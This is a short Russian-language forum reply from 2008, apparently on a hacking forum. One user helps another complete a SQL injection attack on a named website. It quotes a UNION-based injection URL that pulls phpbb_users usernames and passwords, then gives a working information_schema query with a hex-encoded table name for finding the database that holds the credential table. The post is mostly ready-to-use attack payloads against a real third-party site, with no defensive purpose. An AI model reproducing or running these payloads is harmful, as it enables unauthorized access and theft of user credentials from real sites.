Показать сообщение отдельно

  #9  
Старый 16.06.2008, 21:55
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от Ershik  
Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*
я недавно с таким сталкивался.. просто таблица phpbb_users находится в другой ДБ..
собственно вот запрос:
Код:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2e,table_schema,table_name),7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+1,1/*
так узнаем имя той ДБ, где висит табличка phpbb_users, что нам и надо, и составляем запрос на выборку из этой таблички.
 
Ответить с цитированием